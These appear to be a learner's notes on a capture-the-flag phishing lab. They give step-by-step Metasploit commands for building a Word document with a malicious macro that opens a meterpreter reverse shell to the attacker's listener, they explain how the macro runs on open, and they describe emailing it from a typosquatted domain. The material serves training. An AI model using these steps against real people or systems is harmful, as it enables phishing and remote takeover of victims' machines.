Task 16, Day 10 Phishing He had a brain full of macros, and had shells in his soul.

Phishing Attacks

Usually has the purpose of stealing personal information or install malware by having the target fill out a form, open a file, or click a link.

Creating the Attack

To-Dos:

  • Create a document with an embedded malicious macro
  • Listen for incoming connects

Creating the Malicious Document

Can either create a document and embed a malicious macro or use Metasploit Framework to create the document. This guide is using Metasploit:

  • Terminal window and run msfconsole
  • set payload windows/meterpreter/reverse_tcp
  • use exploit/multi/fileformat/office_word_macro though technically not an exploit.
  • set LHOST <ip_address>
  • set LPORT 8888
  • show options to see the configuration options and make sure everything is correct
  • exploit to generate the macro and embed it in a document
  • exit

How the Macro Works

  1. AutoOpen() triggeres the macro automatically when the doc is opened. It then searches the properties of the document for the payload which is stored in the comments field, encoded in base64.
  2. Base64Decode() converts the payload to it’s original form, a Windows executable.
  3. ExecuteForWindows() executes the payload in a temprary directory, connecting back to the attacker’s system IP and port specified.

Interesting notes:

  • Can see the payload in the document properties under File > Info in Word, and I assume right-click > Properties in Explorer.
  • Can copy the comments to a text file and use base64 -d payload-base64.txt > payload.exe then ls -lh to view file sizes as text and executable.
  • Can use Virus Total to process the executable and get information about what the executable does.

Listening for Incoming Connections

Can use MSF to listen to connections coming from our executable. Need to test to see if netcat can also be used to receive connections.

  • msfconsole
  • use multi/handler to handle incoming connections
  • set payload windows/meterpreter/reverse_tcp to ensure payload works with the payload created earlier
  • set LHOST <ip_address> to match the IP used in the earlier payload
  • set LPORT 8888 to match earlier
  • show options to confirm options
  • exploit to start listening

Email the Malicious Document

In this example, the attacker is using email from the socnas.thm domain sending to the target on the socmas.thm domain. This technique is called “typosquatting,” where the malicious domain name is nearly identical to the legitimate one. Exercise is setup so a vm opens the document upon receipt, so not long after hitting send Meterpreter lights up.

Bonus Note - In linux, use CTRL+H to view hidden directories.

The Task

Use the reverse shell to find the flag.

The Phishing module.